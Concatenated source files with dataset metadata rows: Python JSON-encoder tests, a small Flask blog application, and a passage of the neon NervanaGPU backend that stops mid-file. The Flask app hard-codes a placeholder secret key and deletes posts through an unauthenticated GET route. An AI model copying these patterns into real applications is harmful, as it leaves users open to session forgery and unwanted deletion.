self._VerifyEncoding('2015-04-01T17:00Z', actual)
def testEncode_Date(self):
actual = self._PerformEncoding(datetime.date(2014, 2, 3))
self._VerifyEncoding('2014-02-03', actual)
def testEncode_Time(self):
actual = self._PerformEncoding(datetime.time(10, 20, 30))
self._VerifyEncoding('10:20:30', actual)
def testEncode_Key(self):
expected = self.test_key.urlsafe()
actual = self._PerformEncoding(self.test_key)
self._VerifyEncoding(expected, actual)
def testEncode_Model(self):
expected = {
'datetime_prop': '2015-06-03T12:30Z',
'int_prop': 111,
'string_prop': 'STRING!'}
actual = self._PerformEncoding(self.test_model)
self._VerifyEncoding(expected, actual)
def testEncode_SantaEvent(self):
# Test the encoding of a single SantaEvent.
expected = {
'blockable_key': self.blockable_key.urlsafe(),
'class_': ['Event', 'SantaEvent'],
'event_type': constants.EVENT_TYPE.ALLOW_UNKNOWN,
'executing_user': 'user1',
'file_name': 'Product.app',
'file_path': '/Applications/Product.app/Contents/MacOs',
'host_id': 'AAAAAAAA-1111-BBBB-2222-CCCCCCCCCCCC',
'id': '2324342',
'last_blocked_dt': '2015-04-01T17:00Z',
'first_blocked_dt': '2015-04-01T17:00Z',
}
actual = self._PerformEncoding(self.santa_event)
self._VerifyEncoding(expected, actual)
# Test the encoding of a SantaEvent list.
actual = self._PerformEncoding([self.santa_event])
self._VerifyEncoding([expected], actual)
def testEncodeBoolean(self):
"""Test encoding a single Boolean value."""
actual = self._PerformEncoding(True)
self._VerifyEncoding(True, actual)
class JSONEncoderJavascriptTest(BaseEncoderTest):
def setUp(self):
super(JSONEncoderJavascriptTest, self).setUp()
self.json_encoder = json_utils.JSONEncoderJavaScript()
def testEncode_Set(self):
actual = self._PerformEncoding(set(['aaa', 'bbb', 'ccc']))
self._VerifyEncoding(['aaa', 'bbb', 'ccc'], actual)
def testEncode_Frozenset(self):
actual = self._PerformEncoding(frozenset(['aaa', 'bbb', 'ccc']))
self._VerifyEncoding(['aaa', 'bbb', 'ccc'], actual)
def testEncode_Datetime(self):
actual = self._PerformEncoding(datetime.datetime(2015, 4, 1, 17, 0, 0))
self._VerifyEncoding('2015-04-01T17:00Z', actual)
def testEncode_Date(self):
actual = self._PerformEncoding(datetime.date(2014, 2, 3))
self._VerifyEncoding('2014-02-03', actual)
def testEncode_Time(self):
actual = self._PerformEncoding(datetime.time(10, 20, 30))
self._VerifyEncoding('10:20:30', actual)
def testEncode_Key(self):
expected = self.test_key.urlsafe()
actual = self._PerformEncoding(self.test_key)
self._VerifyEncoding(expected, actual)
def testEncode_Model(self):
expected = {
'datetimeProp': '2015-06-03T12:30Z',
'intProp': 111,
'stringProp': 'STRING!'}
actual = self._PerformEncoding(self.test_model)
self._VerifyEncoding(expected, actual)
def testEncode_SantaEvent(self):
# Test the encoding of a single SantaEvent.
expected = {
'blockableKey': self.blockable_key.urlsafe(),
'class_': ['Event', 'SantaEvent'],
'eventType': constants.EVENT_TYPE.ALLOW_UNKNOWN,
'executingUser': 'user1',
'fileName': 'Product.app',
'filePath': '/Applications/Product.app/Contents/MacOs',
'hostId': 'AAAAAAAA-1111-BBBB-2222-CCCCCCCCCCCC',
'id': '2324342',
'lastBlockedDt': '2015-04-01T17:00Z',
'firstBlockedDt': '2015-04-01T17:00Z',
}
actual = self._PerformEncoding(self.santa_event)
self._VerifyEncoding(expected, actual)
# Test the encoding of a SantaEvent list.
actual = self._PerformEncoding([self.santa_event])
self._VerifyEncoding([expected], actual)
def testEncodeBoolean(self):
"""Test encoding a single Boolean value."""
actual = self._PerformEncoding(True)
self._VerifyEncoding(True, actual)
if __name__ == '__main__':
basetest.main()
| 33.481818 | 79 | 0.691827 | 6,448 | 0.875373 | 0 | 0 | 0 | 0 | 0 | 0 | 2,069 | 0.280885 |
9ef7f25002d6a0233c11be0350ae657d327330f8 | 3,728 | py | Python | app.py | YukiNagat0/Blog | 6f01d1a3e73f1f865b5d22dbdbb27a5acfb3e937 | [
"MIT"
]
| 1 | 2021-06-24T17:48:37.000Z | 2021-06-24T17:48:37.000Z | app.py | YukiNagat0/Blog | 6f01d1a3e73f1f865b5d22dbdbb27a5acfb3e937 | [
"MIT"
]
| null | null | null | app.py | YukiNagat0/Blog | 6f01d1a3e73f1f865b5d22dbdbb27a5acfb3e937 | [
"MIT"
]
| null | null | null | from os import path
from typing import Union
from datetime import datetime
from flask import Flask, request, redirect, render_template
from flask_wtf import CSRFProtect
from werkzeug.utils import secure_filename
from data import db_session
from data.posts import Posts
from forms.edit_post_form import EditPostForm
app = Flask(__name__)
app.config['SECRET_KEY'] = 'SECRET_KEY'
csrf_protect = CSRFProtect(app)
UPLOAD_FOLDER = 'static/posts_img/'
app.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER
DATA_BASE = 'db/blog.sqlite'
app.config['DATA_BASE'] = DATA_BASE
def edit_post_in_data_base(form: EditPostForm, post: Union[Posts, None]):
db_sess = db_session.create_session()
post_title = form.title.data
post_text = form.text.data
post_author = form.author.data
post_image = form.image.data
# --- Фотография ---
if not post_image:
post_image_name = '' # Картинки нет
else:
current_id = db_sess.query(Posts).order_by(Posts.id.desc()).first()
current_id = current_id.id + 1 if current_id else 1
real_image_name = secure_filename(post_image.filename)
post_image_name = f'{current_id}{real_image_name[real_image_name.rfind("."):]}'
post_image.save(path.join(app.config['UPLOAD_FOLDER'], post_image_name))
# --- Фотография ---
if not post: # Добавление поста
post = Posts()
post.title = post_title
post.image_name = post_image_name
post.text = post_text
post.author = post_author
post.date = datetime.now()
db_sess.add(post)
else: # редактирование
post.title = post_title
post.image_name = post_image_name
post.text = post_text
post.author = post_author
post.date = datetime.now()
db_sess.merge(post)
db_sess.commit()
db_sess.close()
return redirect('/')
@app.route('/')
def index():
params = {'title': 'Blog', 'UPLOAD_FOLDER': app.config['UPLOAD_FOLDER']}
db_sess = db_session.create_session()
posts = db_sess.query(Posts).order_by(Posts.id.desc()).all()
view = render_template('blog.html', **params, posts=posts)
db_sess.close()
return view
@app.route('/add_post', methods=['GET', 'POST'])
def add_post():
params = {'title': 'Добавление поста', 'action_type': 'Добавление поста', 'submit_text': 'Добавить'}
form = EditPostForm()
params['form'] = form
if form.validate_on_submit():
return edit_post_in_data_base(form, None)
return render_template('edit_post.html', **params)
@app.route('/edit_post/<int:post_id>', methods=['GET', 'POST'])
def edit_post(post_id: int):
params = {'title': 'Редактирование поста', 'action_type': 'Редактирование поста', 'submit_text': 'Редактировать'}
form = EditPostForm()
params['form'] = form
db_sess = db_session.create_session()
post: Posts = db_sess.query(Posts).filter(Posts.id == post_id).first()
db_sess.close()
if not post:
return redirect('/')
if request.method == 'GET':
form.title.data = post.title
form.text.data = post.text
form.author.data = post.author
elif form.validate_on_submit():
return edit_post_in_data_base(form, post)
return render_template('edit_post.html', **params)
@app.route('/delete_post/<int:post_id>')
def delete_post(post_id: int):
db_sess = db_session.create_session()
post = db_sess.query(Posts).filter(Posts.id == post_id).first()
if post:
db_sess.delete(post)
db_sess.commit()
db_sess.close()
return redirect('/')
def main():
db_session.global_init(app.config['DATA_BASE'])
app.run('127.0.0.1', 8080)
if __name__ == '__main__':
main()
| 25.888889 | 117 | 0.668455 | 0 | 0 | 0 | 0 | 1,797 | 0.463503 | 0 | 0 | 805 | 0.207635 |
9ef839c4fcb13ab1bd28852911644c75dc9c3837 | 48,320 | py | Python | neon/backends/gpu.py | kashif/neon | d4d8ed498ee826b67f5fda1746d2d65c8ce613d2 | [
"Apache-2.0"
]
| 1 | 2018-07-17T16:54:58.000Z | 2018-07-17T16:54:58.000Z | neon/backends/gpu.py | kashif/neon | d4d8ed498ee826b67f5fda1746d2d65c8ce613d2 | [
"Apache-2.0"
]
| null | null | null | neon/backends/gpu.py | kashif/neon | d4d8ed498ee826b67f5fda1746d2d65c8ce613d2 | [
"Apache-2.0"
]
| 2 | 2016-06-09T13:05:00.000Z | 2021-02-18T14:18:15.000Z | # ----------------------------------------------------------------------------
# Copyright 2014 Nervana Systems Inc.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ----------------------------------------------------------------------------
"""
Neon backend wrapper for the NervanaGPU library. Most functions are thin
wrappers around functions from the NervanaGPU class, the GPUTensor is taken
directly from NervanaGPU as well.
NervanaGPU is available at `<https://github.com/NervanaSystems/nervanagpu>`
"""
import logging
from neon.backends.backend import Backend
from nervanagpu import NervanaGPU
from neon.diagnostics.timing_decorators import FlopsDecorator
import pycuda.driver as drv
import numpy as np
logger = logging.getLogger(__name__)
class GPU(Backend):
"""
Sets up a NervanaGPU based backend for matrix operations.
Note that some functions defined in the generic Backend class such as
cross-map pooling and normalization and are not implemented for
this backend.
"""
default_dtype = np.float32
def __init__(self, rng_seed, stochastic_round=False, device_id=0):
import pycuda.driver as drv
drv.init()
global ctx
ctx = drv.Device(device_id).make_context()
import atexit
atexit.register(ctx.pop)
self.ng = NervanaGPU(stochastic_round=stochastic_round)
logger.info("Initialized NervanaGPU with stochastic_round=%s",
stochastic_round)
self.rng_seed = rng_seed
self.rng_init()
self.device_id = device_id if device_id is not None else 0
def __getstate__(self):
"""
Defines what and how we go about serializing an instance of this class.
Returns:
self.__dict__: The full contents of the backend class instance,
except for the mem_pool which is on device and
cannot be serialized.
"""
if hasattr(self, 'mem_pool') and self.mem_pool is not None:
self.mem_pool_pickle = {'shape': self.mem_pool.shape,
'dtype': np.float32}
self.mem_pool = None
return self.__dict__
def __setstate__(self, state):
"""
Defines how we go about deserializing into an instance of this class.
Arguments:
self.__dict__: The full contents of the backend class instance,
except for the mem_pool which is on device and
cannot be serialized.
"""
self.__dict__.update(state)
self.mem_pool = self.ng.empty(self.mem_pool_pickle['shape'],
dtype=self.mem_pool_pickle['dtype'])
def init_mempool(self, shape, dtype=default_dtype):
"""
Allocates a memory pool for temporary storage
"""
self.mem_pool = self.ng.empty(shape, dtype=dtype)
def alloc_host_mem(self, shape, dtype=default_dtype):
return drv.pagelocked_empty(shape, dtype, order="C", mem_flags=0)
def create_stream(self):
return drv.Stream()
def synchronize(self):
pass
def async_copy(self, dest, src, stream=None):
drv.memcpy_htod_async(dest.gpudata, src, stream)
def rng_init(self):
"""
Initialize and seed the pseudo random number genrator. Random numbers
are generated on the host using numpy, then transfered to device.
"""
seed = None
if 'rng_seed' in self.__dict__:
seed = self.rng_seed
logger.info("Seeding random number generator with: %s", str(seed))
np.random.seed(seed)
def flop_timing_init(self, decorate_fc, decorate_conv, decorate_ew):
"""
Initialize FLOP timing. Wraps the specified MOP calls via a decorator
to record elapsed time and number of operations.
Arguments:
decorate_fc (list): string giving the function names of fully
connected layer forward/backward/update calls
to time.
decorate_conv (list): string giving the function names of
convolutional layer forward/backward/update
calls to time.
decorate_ew (list): string giving the function names of element-wise
calls to time.
Notes:
Must be called prior to first flop_timing_start call
"""
self.start = drv.Event()
self.end = drv.Event()
self.flop_timer = FlopsDecorator(self)
self.flop_timer.decorate(decorate_fc=decorate_fc,
decorate_conv=decorate_conv,
decorate_ew=decorate_ew)
def flop_timinig_start(self):
"""
Start a new FLOP timer.
Returns:
None: dummy value (not used)
"""
return self.start.record()
def flop_timing_finish(self, start_time):
"""
Complete current FLOP timing.
Arguments:
start_time (unused): ignored.
Returns:
float: elapsed time in seconds since prior flop_timing_start call.
"""
self.end.record()
self.end.synchronize()
return self.end.time_since(self.start)
def uniform(self, low=0.0, high=1.0, size=1, dtype=default_dtype,
persist_values=True, name=None):
"""
generate numpy random number and convert to a GPUTensor.
If called with dype=None it will probably explode
"""
ary = np.random.uniform(low, high, size)
return self.ng.array(ary, dtype=dtype, name=name)
def normal(self, loc=0.0, scale=1.0, size=1, dtype=default_dtype,
persist_values=True, name=None):
"""
Gaussian/Normal random number sample generation
"""
ary = np.random.normal(loc, scale, size)
return self.ng.array(ary, dtype=dtype, name=name)
def fprop_fc(self, out, inputs, weights, layer=None):
"""
Forward propagate the inputs of a fully connected network layer to
produce output pre-activations (ready for transformation by an
activation function).
Arguments:
out (GPUTensor): Where to store the forward propagated results.
inputs (GPUTensor): Will be either the dataset input values (first
layer), or the outputs from the previous layer.
weights (GPUTensor): The weight coefficient values for this layer.
layer (Layer): The layer object.
"""
self.ng.dot(weights, inputs, out)
def bprop_fc(self, out, weights, deltas, layer=None):
"""
Backward propagate the error through a fully connected network layer.
Arguments:
out (GPUTensor): Where to store the backward propagated errors.
weights (GPUTensor): The weight coefficient values for this layer.
deltas (GPUTensor): The error values for this layer
layer (Layer): The layer object.
"""
self.ng.dot(weights.T, deltas, out)
def update_fc(self, out, inputs, deltas, layer=None):
"""
Compute the updated gradient for a fully connected network layer.
Arguments:
out (GPUTensor): Where to store the updated gradient value.
inputs (GPUTensor): Will be either the dataset input values (first
layer), or the outputs from the previous layer.
deltas (GPUTensor): The error values for this layer
layer (Layer): The layer object.
"""
self.ng.dot(deltas, inputs.T, out)
def update_fc_bias(self, err, out):
"""
Compute the updated bias gradient for a fully connected network layer.
Arguments:
out (GPUTensor): Where to store the updated gradient value.
err (GPUTensor): backpropagated error
"""
self.ng.sum(err, axis=1, out=out)
def add_fc_bias(self, inputs, bias):
"""
Add the bias for a fully connected network layer.
Arguments:
inputs (GPUTensor): the input to update.
bias (GPUTensor): the amount to increment
"""
self.ng.add(inputs, bias, out=inputs)
def fprop_conv(self, out, inputs, weights, ofmshape, ofmsize, ofmlocs,
ifmshape, links, nifm, padding, stride, ngroups, fpropbuf,
local=False):
"""
Forward propagate the inputs of a convolutional network layer to
produce output pre-activations (ready for transformation by an
activation function).
Arguments:
out (GPUTensor): Where to store the forward propagated results.
inputs (GPUTensor): Will be either the dataset input values (first
layer), or the outputs from the previous layer.
weights (GPUTensor): The weight coefficient values for this layer.
ofmshape (tuple): Dimensions of each output feature map (typically
number of height and width neurons).
ofmsize (int): Total size of each output feature map.
ofmlocs (GPUTensor): Indices giving the location of each element
in each output feature map stored in out.
ifmshape (tuple): Dimensions of each input feature map (typically
number of height and width neurons). For this
backend we expect these values to be square.
links (GPUTensor): Input receptive field indices.
nifm (int): Total number of input feature maps.
padding (int): Number of additional elements to include along each
dimension of each local receptive field during the
convolution operation.
stride (int): Number of neurons to shift the filter at each step.
ngroups (int): Number of groups.
fpropbuf (GPUTensor): Temporary storage buffer used to hold the
convolved outputs for a single receptive
field. Not used for this backend.
local (bool, optional): Whether to do local filtering (True) or
convolution (False, the default)
"""
'''
N: Number of images in mini-batch
C: Number of input feature maps
K: Number of output feature maps
D: Depth of input image
H: Height of input image
W: Width of input image
T: Depth of filter kernel
R: Height of filter kernel
S: Width of filter kernel
'''
self.ng.fprop_conv(layer=fpropbuf, I=inputs, F=weights, O=out,
alpha=1.0, repeat=1)
def bprop_conv(self, out, weights, deltas, ofmshape, ofmsize, ofmlocs,
ifmshape, links, padding, stride, nifm, ngroups, bpropbuf,
local=False):
"""
Backward propagate the error through a convolutional network layer.
Arguments:
out (GPUTensor): Where to store the backward propagated errors.
weights (GPUTensor): The weight coefficient values for this layer.
deltas (GPUTensor): The error values for this layer
ofmshape (tuple): Dimensions of each output feature map (typically
height and width).
ofmsize (int): Total size of each output feature map.
ofmlocs (GPUTensor): Indices giving the location of each element in
each output feature map stored in out.
ifmshape (tuple): Dimensions of each input feature map (typically
height and width).
links (GPUTensor): Input receptive field indices.
nifm (int): Total number of input feature maps.
padding (int): Number of additional elements to include along each
dimension of each local receptive field during the
convolution operation.
stride (int): Number of neurons to shift the filter at each step.
ngroups (int): Number of groups.
bpropbuf (GPUTensor): Temporary storage buffer used to hold the
backpropagated error for a single receptive
field
local (bool, optional): Whether to do local filtering (True) or
convolution (False, the default)
"""
self.ng.bprop_conv(layer=bpropbuf, F=weights, E=deltas, grad_I=out,
alpha=1.0, repeat=1)
def update_conv(self, out, inputs, weights, deltas, ofmshape, ofmsize,
ofmlocs, ifmshape, links, nifm, padding, stride, ngroups,
fwidth, updatebuf, local=False, layer=None):
"""
Compute the updated gradient for a convolutional network layer.
Arguments:
out (GPUTensor): Where to store the updated gradient value.
inputs (GPUTensor): Will be either the dataset input values (first
layer), or the outputs from the previous layer.
weights (GPUTensor): The weight coefficient values for this layer.
deltas (GPUTensor): The error values for this layer
ofmshape (tuple): Dimensions of each output feature map (typically
height and width).
ofmsize (int): Total size of each output feature map.
ofmlocs (GPUTensor): Indices giving the location of each element in
each output feature map stored in out.
ifmshape (tuple): Dimensions of each input feature map (typically
height and width).
links (GPUTensor): Input receptive field indices.
nifm (int): Total number of input feature maps.
padding (int): Number of additional elements to include along each
dimension of each local receptive field during the
convolution operation.
stride (int): Number of neurons to shift the filter at each step.
ngroups (int): Number of groups.
fwidth (int): Filter width.
updatebuf (GPUTensor): Temporary storage buffer used to hold the
updated gradient for a single receptive
field
local (bool, optional): Whether to do local filtering (True) or
convolution (False, the default)
layer (Layer): The layer object.
"""
self.ng.update_conv(layer=updatebuf, I=inputs, E=deltas, grad_F=out,
alpha=1.0, repeat=1)
def fprop_pool(self, out, inputs, op, ofmshape, ofmsize, ofmlocs, fshape,
ifmshape, links, nifm, padding, stride, fpropbuf):
"""
Forward propagate the inputs of a Pooling network layer to
produce output pre-activations (ready for transformation by an
activation function).
Arguments:
out (GPUTensor): Where to store the forward propagated results.
inputs (GPUTensor): Will be either the dataset input values (first
layer), or the outputs from the previous layer.
op (string): The type of pooling operation to apply. We support
"max", "avg", "l2" currently.
ofmshape (tuple): Dimensions of each output feature map (typically
number of height and width neurons).
ofmsize (int): Total size of each output feature map.
ofmlocs (GPUTensor): Indices giving the location of each element in
each output feature map stored in out.
fshape (tuple): Dimensions of each filter (typically height and
width).
ifmshape (tuple): Dimensions of each input feature map (typically
number of height and width neurons).
links (GPUTensor): Input receptive field indices.
nifm (int): Total number of input feature maps.
padding (int): Number of additional elements to include along each
dimension of each local receptive field during the
pooling operation.
stride (int): Number of neurons to shift the filter at each step.
fpropbuf (GPUTensor): Temporary storage buffer used to hold the
pooled outputs for a single receptive field.
"""
op = op.lower()
if op == "max":
self.ng.fprop_pool(layer=fpropbuf, I=inputs, O=out, repeat=1)
else:
raise AttributeError("unexpected pooling op type: %s", op)
def bprop_pool(self, out, fouts, inputs, deltas, op, ofmshape, ofmsize,
ofmlocs, fshape, fpsize, ifmshape, links, nifm, padding,
stride, bpropbuf):
"""
Backward propagate the error through a pooling network layer.
Arguments:
out (GPUTensor): Where to store the backward propagated errors.
fouts (GPUTensor): Forward propagated outputs from the previous
layer.
inputs (GPUTensor): Will be either the dataset input values (first
layer), or the outputs from the previous layer.
deltas (GPUTensor): The error values for this layer
op (string): The type of pooling operation to apply. We support
"max", "avg", "l2" currently.
ofmshape (tuple): Dimensions of each output feature map (typically
height and width).
ofmsize (int): Total size of each output feature map.
ofmlocs (GPUTensor): Indices giving the location of each element in
each output feature map stored in out.
fshape (tuple): Dimensions of each filter (typically height and
width).
fpsize (int): The size of each filter.
ifmshape (tuple): Dimensions of each input feature map (typically
height and width).
links (GPUTensor): Input receptive field indices.
nifm (int): Total number of input feature maps.
padding (int): Number of additional elements to include along each
dimension of each local receptive field during the
pooling operation.
stride (int): Number of neurons to shift the filter at each step.
bpropbuf (GPUTensor): Temporary storage buffer used to hold the
backpropagated error for a single receptive
field
"""
op = op.lower()
if op == "max":
self.ng.bprop_pool(layer=bpropbuf, I=inputs, E=deltas, grad_I=out,
repeat=1)
else:
raise AttributeError("unexpected pooling op type: %s", op)
def logistic(self, x, out):
"""
Logistic sigmoid nonlinearity, 1/(1+exp(-x))
Arguments:
x (GPUTensor): Input tensor
out (GPUTensor): Output tensor
"""
self.ng.sig(x, out=out)
return out
def transpose(self, untransposed, transposed):
transposed[:] = untransposed.T
def crossent(self, y, t, partial, out, epsilon, doscale, ismulti=False):
"""
Computes cross entropy cost.
Arguments:
y (GPUTensor): Model outputs
t (GPUTensor): Targets
partial (GPUTensor): temporary buffer used for 2D reduction
out (GPUTensor): Storage for the cross entropy output
epsilon (float): constant for numerical stability
doscale (boolean): If True, cross_entropy is scaled by batch size
ismulti (boolean): If True, compute multi class cross_entropy
"""
sumbuf = partial.reshape((partial.size, 1))[:partial.shape[0]]
if ismulti:
self.ng.sum(-t * self.ng.log(y + epsilon),
axis=None, partial=sumbuf, out=out)
else:
self.ng.sum((t - 1) * self.ng.log(1 - y + epsilon) -
t * self.ng.log(y + epsilon),
axis=None, partial=sumbuf, out=out)
if doscale:
out[:] = out / y.shape[1]
return out
def logistic_compound(self, inputs, outputs):
"""
Applies logistic function and its derivative to the dataset passed.
Arguments:
inputs (GPUTensor): Input data to be transformed. This also
acts as storage for the output of the
derivative function.
outputs (GPUTensor): Storage for the transformed output.
"""
# Apply the logistic function.
outputs[:] = self.ng.sig(inputs)
inputs[:] = (1.0 - outputs) * inputs
def rectlin(self, x, out):
"""
Rectified Linear nonlinearity
Arguments:
x (GPUTensor): Input tensor
out (GPUTensor): Output tensor
"""
self.ng.maximum(x, 0., out=out)
return out
def rectlin_derivative(self, x, out):
"""
Rectified linear nonlinearity derivative
Arguments:
x (GPUTensor): Input tensor
out (GPUTensor): Output tensor
"""
self.ng.greater(x, 0, out=out)
return out
def rectleaky(self, x, slope, out):
"""
Leaky rectified linear nonlinearity
Arguments:
x (GPUTensor): Input tensor
slope (float): amount of gradient to apply when unit is not active
out (GPUTensor): Output tensor
"""
out[:] = self.ng.maximum(x, x*slope)
def rectleaky_derivative(self, x, slope, out):
"""
Leaky rectified linear nonlinearity derivative
Arguments:
x (GPUTensor): Input tensor
slope (float): amount of gradient to apply when unit is not active
out (GPUTensor): Output tensor
"""
out[:] = self.ng.greater(x, 0) * (1.0 - slope) + slope
def sum(self, tsr, axes, out):
"""
Sum
Arguments:
tsr (GPUTensor): Input tensor
axes (int): Axis along which the reduction is performed. If axes
is None, the tensor is flattened and reduced over
both dimensions.
out (GPUTensor): Output tensor
"""
if axes is None:
sze = tsr.shape[0]*tsr.shape[1]
self.ng.sum(tsr.reshape(sze, 1), axis=0, out=out)
else:
self.ng.sum(tsr, axis=axes, out=out)
return out
def norm(self, tsr, order=None, axis=None, out=None):
"""
Calculates and returns the vector p-norms of the GPUTensor along the
specified axis. The p-norm is defined on a vector A as
:math:`||A||_p = \sum_i(|A_i|^p)^{1/p}`.
Arguments:
tsr (GPUTensor): the GPUTensor on which to find the norms
order (int): The order or p upon which the norm is calculated.
Valid values include:
None, inf, -inf, 0, 1, -1, 2, -2, ...
axis (int): The axis along which to compute vector norms.
out (GPUTensor): where to write the results to. Must be
of the expected result shape.
Returns:
GPUTensor: p-norm of tsr along the specified axis.
Raises:
IndexError if invalid axis specified
AttributeError if invalid order specified
See Also:
`numpy.linalg.norm`
"""
if not isinstance(axis, int) or axis < 0 or axis >= len(tsr.shape):
raise IndexError("invalid axis value: %s", axis)
if not isinstance(order, (int, float)):
raise AttributeError("invalid order value: %s", order)
if out is None:
raise AttributeError("No output tensor speficied", order)
if order == float('Inf'):
self.ng.max(self.fabs(tsr), axis, out)
elif order == float('-Inf'):
self.ng.min(self.fabs(tsr), axis, out)
elif order == 0:
tmp = self.zeros(tsr.shape)
self.ng.not_equal(tsr, tmp, tmp)
self.ng.sum(tmp, axis, out)
else:
tmp = self.empty(tsr.shape)
self.ng.power(self.fabs(tsr), order, tmp)
self.ng.sum(tmp, axis, out)
self.ng.power(out, (1.0 / order), out)
return out
def mean(self, tsr, axes, out):
"""
Calculates the arithmetic mean of the elements along the specified
axes.
Arguments:
tsr (GPUTensor): Input tensor
axes (int): Axis along which the reduction is performed. If axes
is None, the tensor is flattened and reduced over
both dimensions.
out (GPUTensor): Output tensor
"""
if axes is None:
sze = tsr.shape[0]*tsr.shape[1]
self.ng.mean(tsr.reshape(sze, 1), axis=0, out=out)
else:
self.ng.mean(tsr, axis=axes, out=out)
return out
def min(self, tsr, axes, out):
"""
Calculates the minimum of the elements along the specified
axes.
Arguments:
tsr (GPUTensor): Input tensor
axes (int): Axis along which the reduction is performed. If axes
is None, the tensor is flattened and reduced over
both dimensions.
out (GPUTensor): Output tensor
"""
if axes is None:
sze = tsr.shape[0]*tsr.shape[1]
self.ng.min(tsr.reshape(sze, 1), axis=0, out=out)
else:
self.ng.min(tsr, axis=axes, out=out)
return out
def max(self, tsr, axes, out):
"""
Calculates the maximum of the elements along the specified
axes.
Arguments:
tsr (GPUTensor): Input tensor
axes (int): Axis along which the reduction is performed. If axes
is None, the tensor is flattened and reduced over
both dimensions.
out (GPUTensor): Output tensor
"""
if axes is None:
sze = tsr.shape[0]*tsr.shape[1]
self.ng.max(tsr.reshape(sze, 1), axis=0, out=out)
else:
self.ng.max(tsr, axis=axes, out=out)
return out
def variance(self, tsr, axes, out, mean=None):
"""
Calculates the variance of the elements along the specified
axes.
Arguments:
tsr (GPUTensor): the tensor on which to compute the variance
axes (int, list, optional): the dimension(s) along which to
variance. If set to None, we will
variance over all dimensions.
out (GPUTensor): where the result will be stored.
mean (GPUTensor): the tensor containing mean of tsr
Returns:
GPUTensor: reference to out
"""
if mean is None:
logger.error("GPUTensor requires mean to be specified.")
raise ValueError("mean not specified")
self.ng.mean(self.ng.square(tsr-mean), axis=axes, out=out)
return out
def fabs(self, x, out):
"""
Calculates absolute value of the elements in a tensor
Arguments:
x (GPUTensor): Input tensor
out (GPUTensor): Output tensor
Returns:
GPUTensor: reference to out
"""
self.ng.fabs(x, out=out)
return out
def sqrt(self, x, out):
"""
Calculates square root of the elements in a tensor
Arguments:
x (GPUTensor): Input tensor
out (GPUTensor): Output tensor
Returns:
GPUTensor: reference to out
"""
self.ng.sqrt(x, out=out)
return out
def zeros(self, shape, dtype=default_dtype, persist_values=True):
"""
Allocate a new GPUTensor and fill it with zeros.
Arguments:
shape (tupel): Shape of the desired GPUTensor
dtype (dtype): Optional datatype
persist_values (bool, optional): If set to True (the default), the
values assigned to this Tensor
will persist across multiple begin
and end calls. Setting to False
may provide a performance increase
if values do not need to be
maintained across such calls
Returns:
GPUTensor: output
"""
return self.ng.zeros(shape, dtype=dtype)
def ones(self, shape, dtype=default_dtype, persist_values=True):
"""
Allocate a new GPUTensor and fill it with ones.
Arguments:
shape (tupel): Shape of the desired GPUTensor
dtype (dtype): Optional datatype
persist_values (bool, optional): If set to True (the default), the
values assigned to this Tensor
will persist across multiple begin
and end calls. Setting to False
may provide a performance increase
if values do not need to be
maintained across such calls
Returns:
GPUTensor: output
"""
return self.ng.ones(shape, dtype=dtype)
def zeros_like(self, ary, dtype=default_dtype, persist_values=True,
name=None):
"""
Instantiate a new instance of this backend's Tensor class, with the
shape taken from ary and populating each element with a value of 0.
Arguments:
ary (tensor object): Tensor to inherit the dimensions of.
dtype (data-type, optional): If present, specifies the underlying
type to employ for each element.
persist_values (bool, optional): If set to True (the default), the
values assigned to this Tensor
will persist across multiple begin
and end calls. Setting to False
may provide a performance increase
if values do not need to be
maintained across such calls
Returns:
Tensor: array object
Raises:
NotImplementedError: Can't be instantiated directly.
See Also:
:py:func:`~neon.backends.backend.Backend.empty`,
:py:func:`~neon.backends.backend.Backend.ones`,
:py:func:`~neon.backends.backend.Backend.array`
"""
return self.zeros(ary.shape, dtype=dtype,
persist_values=persist_values)
def empty_like(self, ary, dtype=default_dtype, persist_values=True,
name=None):
"""
Instantiate a new instance of this backend's Tensor class, with the
shape taken from ary.
Arguments:
ary (tensor object): Tensor to inherit the dimensions of.
dtype (data-type, optional): If present, specifies the underlying
type to employ for each element.
persist_values (bool, optional): If set to True (the default), the
values assigned to this Tensor
will persist across multiple begin
and end calls. Setting to False
may provide a performance increase
if values do not need to be
maintained across such calls
Returns:
Tensor: array object
Raises:
NotImplementedError: Can't be instantiated directly.
See Also:
:py:func:`~neon.backends.backend.Backend.empty`,
:py:func:`~neon.backends.backend.Backend.ones`,
:py:func:`~neon.backends.backend.Backend.array`
"""
return self.empty(ary.shape, dtype=dtype,
persist_values=persist_values, name=name)
def empty(self, shape, dtype=default_dtype, persist_values=True,
name=None):
"""
Allocate a new GPUTensor.
Arguments:
shape (tupel): Shape of the desired GPUTensor
dtype (dtype): Optional datatype
persist_values (bool, optional): If set to True (the default), the
values assigned to this Tensor
will persist across multiple begin
and end calls. Setting to False
may provide a performance increase
if values do not need to be
maintained across such calls
Returns:
GPUTensor: output
"""
return self.ng.empty(shape, dtype=dtype)
def copy(self, ary):
"""
returns a copy of ary
"""
res = self.empty_like(ary)
res.copy(ary)
return res
def array(self, ary, dtype=default_dtype, persist_values=True, name=None,
allocator=drv.mem_alloc):
"""
Allocate a new GPUTensor and fill it with supplied numpy array.
Arguments:
ary (ndarray): Numpy array with source data
dtype (dtype, optional): Optional datatype
persist_values (bool, optional): If set to True (the default), the
values assigned to this Tensor
will persist across multiple begin
and end calls. Setting to False
may provide a performance increase
if values do not need to be
maintained across such calls
name (string): Name for the GPUTensor
allocator (pycuda): Pycuda memory allocator
Returns:
GPUTensor: output
"""
return self.ng.array(ary, dtype=dtype, name=name)
def add(self, left, right, out):
"""
Elementwise addition
Arguments:
left (GPUTensor, numeric): left-hand side operand.
right (GPUTensor, numeric): right-hand side operand.
out (GPUTensor): where the result will be stored.
Returns:
GPUTensor: reference to out
"""
self.ng.add(left, right, out=out)
return out
def subtract(self, left, right, out):
"""
Elementwise subtraction
Arguments:
left (GPUTensor, numeric): left-hand side operand.
right (GPUTensor, numeric): right-hand side operand.
out (GPUTensor): where the result will be stored.
Returns:
GPUTensor: reference to out
"""
self.ng.subtract(left, right, out=out)
return out
def multiply(self, left, right, out):
"""
Elementwise multiplication
Arguments:
